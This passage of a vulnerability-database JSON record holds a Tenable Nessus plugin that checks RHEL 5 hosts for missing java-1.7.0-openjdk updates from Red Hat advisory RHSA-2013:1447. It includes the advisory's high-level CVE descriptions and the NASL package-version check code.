Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850, CVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.\n(CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "edition": 1, "hash": "bd8b6ab6b60671faf9f83178d8501a4e0d31ed501e1a3d729dae72146bd34d09", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "118382c03abaa3b485dbe4bb05d7fce0", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "bbd32ee296cd9916b85e8a3a2785f280", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "6b88e9e1569a7e403c2a9fd24de5e45b", "key": "href"}, {"hash": "f4263cb7ab9b83d87b6d91af466e0d19", "key": "description"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "5b253987191eeddaec27a34011982132", "key": "published"}, {"hash": "4fbd848df540aebf66e3dacc295ede8d", "key": "title"}, {"hash": "98f00858001a0dd10fbd90da55b4ee8c", "key": "modified"}, {"hash": "a8d17209fbdcb219e541d75f87424838", "key": "sourceData"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "0f53e31ba1befcd78a8de722fd263e97", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=70536", "id": "REDHAT-RHSA-2013-1447.NASL", "lastseen": "2016-09-26T17:25:55", "modified": "2014-11-08T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.2", "pluginID": "70536", "published": "2013-10-22T00:00:00", "references": ["https://www.redhat.com/security/data/cve/CVE-2013-5849.html", "https://www.redhat.com/security/data/cve/CVE-2013-5814.html", "https://www.redhat.com/security/data/cve/CVE-2013-3829.html", "https://www.redhat.com/security/data/cve/CVE-2013-5820.html", "https://www.redhat.com/security/data/cve/CVE-2013-5778.html", "https://www.redhat.com/security/data/cve/CVE-2013-5825.html", "https://www.redhat.com/security/data/cve/CVE-2013-5842.html", "https://www.redhat.com/security/data/cve/CVE-2013-5829.html", "https://www.redhat.com/security/data/cve/CVE-2013-5772.html", "https://www.redhat.com/security/data/cve/CVE-2013-5803.html", "https://www.redhat.com/security/data/cve/CVE-2013-5797.html", "https://www.redhat.com/security/data/cve/CVE-2013-5830.html", "https://www.redhat.com/security/data/cve/CVE-2013-5809.html", "https://www.redhat.com/security/data/cve/CVE-2013-5782.html", "https://www.redhat.com/security/data/cve/CVE-2013-5840.html", "https://www.redhat.com/security/data/cve/CVE-2013-5774.html", "https://www.redhat.com/security/data/cve/CVE-2013-5838.html", "https://www.redhat.com/security/data/cve/CVE-2013-5800.html", "https://www.redhat.com/security/data/cve/CVE-2013-4002.html", "https://www.redhat.com/security/data/cve/CVE-2013-5851.html", "https://www.redhat.com/security/data/cve/CVE-2013-5850.html", "https://www.redhat.com/security/data/cve/CVE-2013-5823.html", "https://www.redhat.com/security/data/cve/CVE-2013-5817.html", "https://www.redhat.com/security/data/cve/CVE-2013-5790.html", "https://www.redhat.com/security/data/cve/CVE-2013-5780.html", "https://www.redhat.com/security/data/cve/CVE-2013-5783.html", "http://rhn.redhat.com/errata/RHSA-2013-1447.html", "https://www.redhat.com/security/data/cve/CVE-2013-5784.html", "https://www.redhat.com/security/data/cve/CVE-2013-5802.html", "https://www.redhat.com/security/data/cve/CVE-2013-5804.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:1447. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70536);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2014/11/08 02:22:00 $\");\n\n script_cve_id(\"CVE-2013-3829\", \"CVE-2013-4002\", \"CVE-2013-5772\", \"CVE-2013-5774\", \"CVE-2013-5778\", \"CVE-2013-5780\", \"CVE-2013-5782\", \"CVE-2013-5783\", \"CVE-2013-5784\", \"CVE-2013-5790\", \"CVE-2013-5797\", \"CVE-2013-5800\", \"CVE-2013-5802\", \"CVE-2013-5803\", \"CVE-2013-5804\", \"CVE-2013-5809\", \"CVE-2013-5814\", \"CVE-2013-5817\", \"CVE-2013-5820\", \"CVE-2013-5823\", \"CVE-2013-5825\", \"CVE-2013-5829\", \"CVE-2013-5830\", \"CVE-2013-5838\", \"CVE-2013-5840\", \"CVE-2013-5842\", \"CVE-2013-5849\", \"CVE-2013-5850\", \"CVE-2013-5851\");\n script_bugtraq_id(61310, 63082, 63089, 63095, 63098, 63101, 63102, 63103, 63106, 63110, 63111, 63115, 63118, 63120, 63121, 63128, 63131, 63133, 63134, 63135, 63137, 63142, 63143, 63146, 63148, 63149, 63150, 63153, 63154);\n script_osvdb_id(95418, 98524, 98525, 98526, 98531, 98532, 98535, 98536, 98544, 98546, 98548, 98549, 98550, 98551, 98552, 98558, 98559, 98560, 98562, 98563, 98564, 98565, 98566, 98567, 98568, 98569, 98571, 98572, 98573);\n script_xref(name:\"RHSA\", value:\"2013:1447\");\n\n script_name(english:\"RHEL 5 : java-1.7.0-openjdk (RHSA-2013:1447)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.7.0-openjdk packages that fix various security issues\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native\nimage parsing code. A specially crafted image file could trigger a\nJava Virtual Machine memory corruption and, possibly, lead to\narbitrary code execution with the privileges of the user running the\nJava Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for\nnon-public proxy classes. A remote attacker could possibly use this\nflaw to execute arbitrary code with the privileges of the user running\nthe Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D,\nCORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817,\nCVE-2013-5842, CVE-2013-5850, CVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image\nreading and writing code in the 2D component. An untrusted Java\napplication or applet could use these flaws to corrupt the Java\nVirtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use\nthis flaw to supply a crafted XML that would be processed without the\nintended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security\ncomponents processes XML inputs. A remote attacker could create a\ncrafted XML that would cause a Java application to use an excessive\namount of CPU and memory when processed. (CVE-2013-5825,\nCVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the\nLibraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting\ncomponents in OpenJDK. An untrusted Java application or applet could\nuse these flaws to bypass certain Java sandbox restrictions.\n(CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783,\nCVE-2013-5820, CVE-2013-5851, CVE-2013-5800, CVE-2013-5849,\nCVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the\nJava Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When\njavadoc documentation was generated from an untrusted Java source code\nand hosted on a domain not controlled by the code author, these issues\ncould make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings\nreturned by toString() methods. These flaws could possibly lead to an\nunexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data\nadded into the HTML pages it generated. Crafted content in the memory\nof a Java program analyzed using jhat could possibly be used to\nconduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using\nJGSS to exit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-3829.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-4002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5772.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5774.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5778.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5780.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5782.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5783.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5784.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5790.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5797.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5800.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5802.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5803.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5804.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5809.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5814.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5817.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5820.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5823.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5825.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5829.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5838.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5840.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5842.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5849.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5850.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5851.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2013-1447.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2014 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.45-2.4.3.1.el5_10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-debuginfo / etc\");\n}\n", "title": "RHEL 5 : java-1.7.0-openjdk (RHSA-2013:1447)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:25:55"}], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "c7edc6c61a927ed317ac130b51fac2d6"}, {"key": "cvelist", "hash": "bbd32ee296cd9916b85e8a3a2785f280"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "f4263cb7ab9b83d87b6d91af466e0d19"}, {"key": "href", "hash": "6b88e9e1569a7e403c2a9fd24de5e45b"}, {"key": "modified", "hash": "369eb856f7dc4cfd31b9acc3c0811267"}, {"key": "naslFamily", "hash": "b46559ea68ec9a13474c3a7776817cfd"}, {"key": "pluginID", "hash": "0f53e31ba1befcd78a8de722fd263e97"}, {"key": "published", "hash": "5b253987191eeddaec27a34011982132"}, {"key": "references", "hash": "118382c03abaa3b485dbe4bb05d7fce0"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "aa68929fd1eb36b57f2e26cc3d07d7d9"}, {"key": "title", "hash": "4fbd848df540aebf66e3dacc295ede8d"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "841d520eaeee2f51a935586ddec10d890b9f44e2d0a5e99cef671ac558db689f", "viewCount": 3, "enchantments": {"vulnersScore": 4.7}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:1447. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70536);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2017/01/05 16:29:44 $\");\n\n script_cve_id(\"CVE-2013-3829\", \"CVE-2013-4002\", \"CVE-2013-5772\", \"CVE-2013-5774\", \"CVE-2013-5778\", \"CVE-2013-5780\", \"CVE-2013-5782\", \"CVE-2013-5783\", \"CVE-2013-5784\", \"CVE-2013-5790\", \"CVE-2013-5797\", \"CVE-2013-5800\", \"CVE-2013-5802\", \"CVE-2013-5803\", \"CVE-2013-5804\", \"CVE-2013-5809\", \"CVE-2013-5814\", \"CVE-2013-5817\", \"CVE-2013-5820\", \"CVE-2013-5823\", \"CVE-2013-5825\", \"CVE-2013-5829\", \"CVE-2013-5830\", \"CVE-2013-5838\", \"CVE-2013-5840\", \"CVE-2013-5842\", \"CVE-2013-5849\", \"CVE-2013-5850\", \"CVE-2013-5851\");\n script_bugtraq_id(61310, 63082, 63089, 63095, 63098, 63101, 63102, 63103, 63106, 63110, 63111, 63115, 63118, 63120, 63121, 63128, 63131, 63133, 63134, 63135, 63137, 63142, 63143, 63146, 63148, 63149, 63150, 63153, 63154);\n script_osvdb_id(95418, 98524, 98525, 98526, 98531, 98532, 98535, 98536, 98544, 98546, 98548, 98549, 98550, 98551, 98552, 98558, 98559, 98560, 98562, 98563, 98564, 98565, 98566, 98567, 98568, 98569, 98571, 98572, 98573);\n script_xref(name:\"RHSA\", value:\"2013:1447\");\n\n script_name(english:\"RHEL 5 : java-1.7.0-openjdk (RHSA-2013:1447)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.7.0-openjdk packages that fix various security issues\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native\nimage parsing code. A specially crafted image file could trigger a\nJava Virtual Machine memory corruption and, possibly, lead to\narbitrary code execution with the privileges of the user running the\nJava Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for\nnon-public proxy classes. A remote attacker could possibly use this\nflaw to execute arbitrary code with the privileges of the user running\nthe Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D,\nCORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817,\nCVE-2013-5842, CVE-2013-5850, CVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image\nreading and writing code in the 2D component. An untrusted Java\napplication or applet could use these flaws to corrupt the Java\nVirtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use\nthis flaw to supply a crafted XML that would be processed without the\nintended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security\ncomponents processes XML inputs. A remote attacker could create a\ncrafted XML that would cause a Java application to use an excessive\namount of CPU and memory when processed. (CVE-2013-5825,\nCVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the\nLibraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting\ncomponents in OpenJDK. An untrusted Java application or applet could\nuse these flaws to bypass certain Java sandbox restrictions.\n(CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783,\nCVE-2013-5820, CVE-2013-5851, CVE-2013-5800, CVE-2013-5849,\nCVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the\nJava Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When\njavadoc documentation was generated from an untrusted Java source code\nand hosted on a domain not controlled by the code author, these issues\ncould make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings\nreturned by toString() methods. These flaws could possibly lead to an\nunexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data\nadded into the HTML pages it generated. Crafted content in the memory\nof a Java program analyzed using jhat could possibly be used to\nconduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using\nJGSS to exit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-3829.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-4002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5772.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5774.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5778.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5780.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5782.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5783.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5784.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5790.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5797.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5800.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5802.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5803.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5804.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5809.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5814.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5817.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5820.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5823.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5825.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-5829.html\"\n 